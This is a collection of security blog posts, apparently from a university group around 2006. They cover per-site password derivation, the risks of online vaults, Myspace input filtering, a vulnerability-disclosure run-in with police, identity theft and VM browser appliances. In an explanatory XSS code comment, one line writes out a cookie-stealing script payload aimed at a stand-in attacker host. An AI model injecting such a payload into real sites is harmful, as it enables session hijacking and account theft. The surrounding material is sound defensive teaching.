Once again, Scott Adams cuts to the heart of the matter. Here’s a great explanation of what’s what with electronic voting machines.
In my earlier posts on passwords, I noted that I approach online password “vaults” with caution. I have no reason to doubt that the many password services, secure email services, and other encrypted network services are legitimate. However, I am unable to adequately verify that this is the case for anything I would truly want to protect. It is also possible that an employee has compromised the software, or that a rootkit has been installed, so even a service designed to be legitimate may be compromised without the rightful owner’s knowledge.
For a similar reason, I don’t use the same password at multiple sites—I use a different password for each, so if one site is “dishonest” (or compromised) I don’t lose security at all my sites.
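One way to get a unique password per site without trusting any remote service is to derive each password from a single master secret that never leaves your machine. Here is a minimal Python sketch of that idea; the function name and parameters are my own illustration, not any particular tool’s:

```python
import base64
import getpass
import hashlib

def site_password(master: str, site: str, length: int = 16) -> str:
    # Derive a site-specific key from the master secret. The site
    # name serves as the salt, so every site gets a different
    # password, yet nothing needs to be stored online at all.
    raw = hashlib.pbkdf2_hmac(
        "sha256",
        master.encode("utf-8"),
        site.encode("utf-8"),
        100_000,  # iteration count; slows down brute-force attempts
    )
    return base64.b64encode(raw).decode("ascii")[:length]

if __name__ == "__main__":
    master = getpass.getpass("Master secret: ")
    print(site_password(master, "example.com"))
```

The obvious trade-off is that if the master secret leaks, every derived password falls with it, and changing just one site’s password requires some kind of versioning scheme.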
For items that I don’t value very much, the convenience of an online vault service might outweigh my paranoia—but that hasn’t happened yet.
Today I ran across this:
MyBlackBook [ver 1.85 live] - Internet’s First Secure & Confidential Online Sex Log!
My first thought was “Wow! What a way to datamine information on potential hot dates!”
That quickly led to the realization that this is an *incredible* tool for collecting blackmail information. Even if the people operating it are legit (and I have no reason to believe they are anything but honest), this site will be a prime target for criminals.
It may also be a prime target for lawyers seeking information on personal damages, divorce actions, and more.
My bottom line: don’t store things remotely online, even in “secure” storage, unless you wouldn’t mind seeing them published in a blog somewhere, or worse. Of course, storing things locally with poor security is not really much better…
You know, I would feel a lot better about this technology if someone had fixed the basic problems with the way browsers handle JavaScript, if JavaScript policy specifications and compliance testing existed, if there were good, usable, and mature static analysis tools that could detect cross-site scripting vulnerabilities (Pixy, by Jovanovic et al., comes to mind as a promising open source tool), and if people actually used them. These problems have been known for a long time.
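For readers who haven’t seen the bug class up close: the core cross-site scripting flaw is a flow from untrusted input to HTML output with no escaping in between, which is exactly the kind of taint flow that tools like Pixy trace. Pixy targets PHP; this illustrative sketch is Python:

```python
import html

def greeting_vulnerable(name: str) -> str:
    # Untrusted input flows straight into the markup. A "name" like
    # <script>new Image().src='http://evil.example/?c='+document.cookie</script>
    # runs in every visitor's browser.
    return "<p>Hello, " + name + "</p>"

def greeting_safe(name: str) -> str:
    # Escaping at the output boundary renders the same input inert:
    # angle brackets become &lt; and &gt;, so no script executes.
    return "<p>Hello, " + html.escape(name) + "</p>"
```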
So, tell me again: do you really want to build castles on that foundation? It sounds like a bad idea to me. We can always hope that the AJAX horror stories (to come) will eventually drive security improvements, but I’d rather not be in the crowd of early sufferers. At the very least, please do me a favor and honor the principle of graceful degradation, so that if I visit your web site with JavaScript turned off, I can still make some use of it.
OSCON 2006 was a lot of fun for a lot of reasons, and was overall a very positive experience. There were a few things that bugged me, though.
I met a lot of cool people at OSCON. There are too many folks to list here without either getting really boring or forgetting someone, but I was happy to put a lot of faces to names and exchange ideas with some Very Smart People. The PHP Security Hoedown BOF that I moderated was especially good in that respect, I thought. There were also a lot of good sessions, especially Theo Schlossnagle’s Big Bad PostgreSQL: A Case Study, Chris Shiflett’s PHP Security Testing, and the PHP Lightning Talks (“PHP-Nuke is a honeypot” - thank you for the best quote of the convention, Zak Greant).
On the other hand, I was very surprised that the Security track at OSCON was almost nonexistent. There were four sessions and one tutorial, and for a 5-day event with many sessions running in parallel, that is a really poor showing. The only other tracks that had security-related sessions were:
which leaves us with the following tracks with no security-oriented sessions:
I can certainly think of a few pertinent security topics for each of these tracks. I’m not affiliated with O’Reilly, and I have no idea whether the OSCON planners just didn’t get many security-related proposals, or whether they felt that attendees wouldn’t be interested in them. Either way, it’s worrisome.
Security is an essential part of any kind of development: as fundamental as interface design or performance. Developers are stewards of the data of their users, and if we don’t take that responsibility seriously, all our sweet gradient backgrounds and performance optimizations are pointless. So to see, for one reason or another, security relegated to steerage at OSCON was disappointing. I hope O’Reilly works hard to correct this next year, and I’m going to encourage other CERIAS folk like Pascal Meunier and Keith Watson to send in proposals for 2007.
Myspace, the super-popular web site that your kid uses and you don’t, was once again hit by a worm, this time utilizing Macromedia Flash as its primary vector. This was a reminder for me of just how badly Myspace has screwed up when it comes to input filtering:
Even if they can plug these holes, it’s unlikely that anything short of a full rewrite/refactorization of their profile customization system can ever be considered moderately secure.
So will Myspace get their act together and modify their input filtering approaches? Very unlikely. A large portion of Myspace’s appeal relies upon the customization techniques that allow users to decorate their pages with all manner of obnoxious flashing, glittery animations and videos. Millions of users use cobbled-together hacks to twist their profiles into something fancier than the default, and a substantial cottage industry has sprung up around the subject. Doing proper input filtering means undoing much of that.
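For contrast, “proper input filtering” generally means an allowlist: accept only markup you explicitly permit, instead of trying to enumerate and strip everything dangerous, which is the game Myspace keeps losing. A toy Python sketch of the principle (the tag list and names are made up, and a real filter should be built on an HTML parser, not a regex):

```python
import re

# Allowlist: anything not explicitly permitted is removed.
ALLOWED_TAGS = {"b", "i", "u", "p", "br"}

TAG_RE = re.compile(r"</?\s*([a-zA-Z0-9]+)[^>]*>")

def filter_profile_html(source: str) -> str:
    def rebuild(match):
        tag = match.group(1).lower()
        if tag in ALLOWED_TAGS:
            closing = "/" if match.group(0).lstrip("<").startswith("/") else ""
            return "<%s%s>" % (closing, tag)  # allowed tag, attributes dropped
        return ""  # unknown tag: removed entirely
    return TAG_RE.sub(rebuild, source)

print(filter_profile_html('<b onmouseover="alert(1)">hi</b><script>evil()</script>'))
# -> <b>hi</b>evil()
```

Note that even this toy leaves the stripped script’s body behind as harmless plain text, and regexes miss malformed markup that browsers will still happily parse; hence the parser caveat.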
Even if relatively secure equivalent techniques are offered, Myspace would certainly find themselves with a disgruntled user base that’s more likely to bail to a competitor. That’s an incredibly risky move in the social networking market, and will likely lead Myspace to continue plugging holes rather than building a dam that works.
This is why you can’t design web applications with security as an afterthought. Myspace has, and I think it will prove to be their biggest mistake.
I was involved in disclosing a vulnerability found by a student to a production web site using custom software (i.e., we didn’t have access to the source code or configuration information). As luck would have it, the web site got hacked. I had to talk to a detective in the resulting police investigation. Nothing bad happened to me, but it could have, for two reasons.
The first reason is that whenever you do something “unnecessary”, such as reporting a vulnerability, police wonder why, and how you found out. Police also wonder: if you found one vulnerability, could you have found more and not reported them? Who did you disclose that information to? Did you get into the web site, and do anything there that you shouldn’t have? It’s normal for the police to think that way. They have to. Unfortunately, it makes reporting any problems very unappealing.
A typical difficulty encountered by vulnerability researchers is that administrators or programmers often deny that a problem is exploitable or of any consequence, and request a proof. This got Eric McCarty in trouble: the proof is automatically proof that you breached the law, and can be used to prosecute you! Thankfully, the administrators of the web site believed our report without trapping us by requesting a proof in the form of an exploit, and fixed it in record time. We could have been in trouble if we had believed that a request for a proof was an authorization to perform penetration testing. I believe that I would have requested a signed authorization before doing it, but it is easy to imagine a well-meaning student not being as cautious (or I could have forgotten to request the written authorization, or they could have refused to provide it…). Because the vulnerability was fixed in record time, we were also protected from being accused of the subsequent break-in, which happened after the fix and therefore had to use some other means. If there had been an overlap in time, we could have become suspects.
The second reason that bad things could have happened to me is that I’m stubborn and believe that in a university setting, it should be acceptable for students who stumble across a problem to report vulnerabilities anonymously through an approved person (e.g., a staff or faculty member) and mechanism. Why anonymously? Because student vulnerability reporters are akin to whistleblowers. They are quite vulnerable to retaliation from the administrators of web sites (especially if it’s a faculty web site that is used for grading). In addition, student reporters need to be protected from the situation described above, where they can become suspects and possibly be unjustly accused simply because someone else exploited the web site around the same time that they reported the problem. Unlike security professionals, they do not understand the risks they take by reporting vulnerabilities (many security professionals don’t fully understand them yet either). They may try to confirm that a web site is actually vulnerable by creating an exploit, without ill intentions. Students can be guided to avoid those mistakes by having a resource person to help them report vulnerabilities.
So, as a stubborn idealist I clashed with the detective by refusing to identify the student who had originally found the problem. I knew the student enough to vouch for him, and I knew that the vulnerability we found could not have been the one that was exploited. I was quickly threatened with the possibility of court orders, and the number of felony counts in the incident was brandished as justification for revealing the name of the student. My superiors also requested that I cooperate with the detective. Was this worth losing my job? Was this worth the hassle of responding to court orders, subpoenas, and possibly having my computers (work and personal) seized? Thankfully, the student bravely decided to step forward and defused the situation.
As a consequence of that experience, I intend to provide the following instructions to students (until something changes):
Edit (5/24/06): Most of the comments below are interesting, and I’m glad you took the time to respond. After an email exchange with CERT/CC, I believe that they can genuinely help by shielding you from having to answer questions from and directly deal with law enforcement, as well as from the pressures of an employer. There is a limit to the protection that they can provide, and past that limit you may be in trouble, but it is a valuable service.
This is a great blog posting: Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security. The data and links are comprehensive, and the message is right on. There is a tone of rant to the message, but it is justified.
I was thinking of writing something like this, but Noam has done it first, and maybe more completely in some areas than I would have. I probably would have also said something about the terrible state of Federal support for infosec research, however, and also mentioned the PITAC report on cyber security.
A recent study by the US Justice Department notes that households headed by individuals between the ages of 18 and 24 are the most likely to experience identity theft. The report does not investigate why this age group is more susceptible, so I’ve started a list:
I’m sure there are many more contributing factors. What interests me is determining the appropriate role of the university in helping to prevent identity theft among this age group. Most colleges and universities now engage in information security awareness and training initiatives with the goal of protecting the university’s infrastructure and the privacy of information covered by regulations such as FERPA, HIPAA, and so on. Should higher education institutions extend infosec awareness campaigns to cover personal privacy protection and identity theft? What are the benefits to universities? What are their responsibilities to their students?
For educational organizations interested in educating students about the risks of identity theft, the U.S. Department of Education has a website devoted to the topic as does EDUCAUSE.
The results are in from the EDUCAUSE Security Task Force’s Computer Security Awareness Video Contest. Topics covered include spyware, phishing, and patching. The winning video, Superhighway Safety, uses a simple running metaphor, a steady beat, and stark visual effects to concisely convey the dangers of online computing, as well as the steps one can take to protect his or her computer and personal information.
The videos are available for educational, noncommercial use, provided that each is identified as being a winning entry in the contest. In addition to being great educational/awareness tools, they should serve as inspiration for K-12 schools as well as colleges and universities.
According to the National Vulnerability Database (http://nvd.nist.gov), the number of vulnerabilities found every year increases: 1253 in 2003, 2343 in 2004, and 4734 in 2005. We take security risks not only by choosing a specific operating system, but also by installing applications and services. We take risks by browsing the web, because web sites insist on running code on our systems: JavaScript, Flash (ActionScript), Java, ActiveX, VBscript, QuickTime, and all the plug-ins and browser extensions imaginable. Applications we pay for want to probe the network to make sure there isn’t another copy running on another computer, creating a vector by which malicious replies could attack us.
Games refuse to install in unprivileged accounts so that they can run their own spyware-like integrity checkers with full privileges (e.g., WoW, but others do the same, e.g., Lineage II), which in turn can even deny you the ability to terminate (kill) the game if it hangs (e.g., Lineage II). Supposedly this is done to prevent cheating, but it gives the game companies full access to and control of your machine, which is objectionable. On top of that, those games are networked applications, meaning that any vulnerability in them could result in a complete (i.e., root, LocalSystem) compromise.
It is common knowledge that if a worm like MyTob compromises your system, you need to wipe the drive and reinstall everything. This is in part because these worms are so hard to remove, as they attack security software and prevent firewalls and virus scanners from functioning properly. However, there is also a trust issue: a rootkit could have been installed, so you can’t trust that computer anymore. So, if you do any sensitive work, or are just afraid of losing your work in progress, you need a dedicated gaming or internet PC. Or do you?
VMWare offers a free download of VMWare Player on their web site, as well as a “browser appliance” based on Firefox and Ubuntu Linux. The advantage is that you no longer need to install and *trust* a browser (Internet Explorer, Firefox, or any other) on your main system. If a worm compromises Firefox, or malicious JavaScript changes settings and takes control of it, you can simply trash the browser appliance and download a new copy. I can’t overemphasize how much less work this is compared to reinstalling Windows XP for the nth time, possibly having to call the license validation phone line, and frantically trying to find a recent backup that works and isn’t infected too. As long as VMWare Player can contain the infection, your installation is preserved. Also hosted on the VMWare site are various community-created images that let you test software at essentially no risk, with no configuration work!
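The “trash it and start over” step is simple enough to script. A sketch in Python, assuming you keep a pristine copy of the appliance directory around (all paths here are hypothetical):

```python
import shutil
from pathlib import Path

# Hypothetical locations: a known-good copy and the working copy.
PRISTINE = Path.home() / "vm-images" / "browser-appliance-pristine"
WORKING = Path.home() / "vm-images" / "browser-appliance"

def reset_appliance() -> None:
    """Discard the (possibly compromised) appliance and restore a clean copy."""
    if WORKING.exists():
        shutil.rmtree(WORKING)          # throw away the suspect image
    shutil.copytree(PRISTINE, WORKING)  # restore the known-good image

if __name__ == "__main__":
    reset_appliance()
    print("Browser appliance restored; relaunch it in VMWare Player.")
```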
After experiencing this, I am left to wonder: why aren’t all applications like a VMWare “appliance” image, and the operating system like VMWare Player? They should be. Efforts to engineer software security have obviously failed to contain the growth of vulnerabilities and security problems, and applying the same solutions to the same problems will keep producing the same failures. I’m not giving up on secure programming and secure software engineering, as I can see promising languages, development methods, and technologies appearing, but in the meantime I can’t trust my personal computers, and I need to compartmentalize by buying separate machines. That is expensive and inconvenient. Virtual machines provide an alternative. In the past, storing an entire operating system image for each application was unthinkable; nowadays, storage is so cheap and abundant that the size of “appliance” images is no longer an issue. It is time to virtualize the entire machine; all I now require from the base operating system is to manage a file system and be able to launch VMWare Player, with at least a browser appliance to bootstrap… Well, not quite. Isolated appliances are not so useful; I want to be able to transfer documents from appliance to appliance. This is easily accomplished with a USB memory stick, or perhaps a virtual drive that I can mount when needed. Such shared storage could become a new propagation vector for viruses, but it would be very limited in scope.
Virtual machine appliances, anyone?
Note (March 13, 2006): Virtual machines can’t defend against cross-site scripting vulnerabilities (XSS), so they are not a solution for all security problems.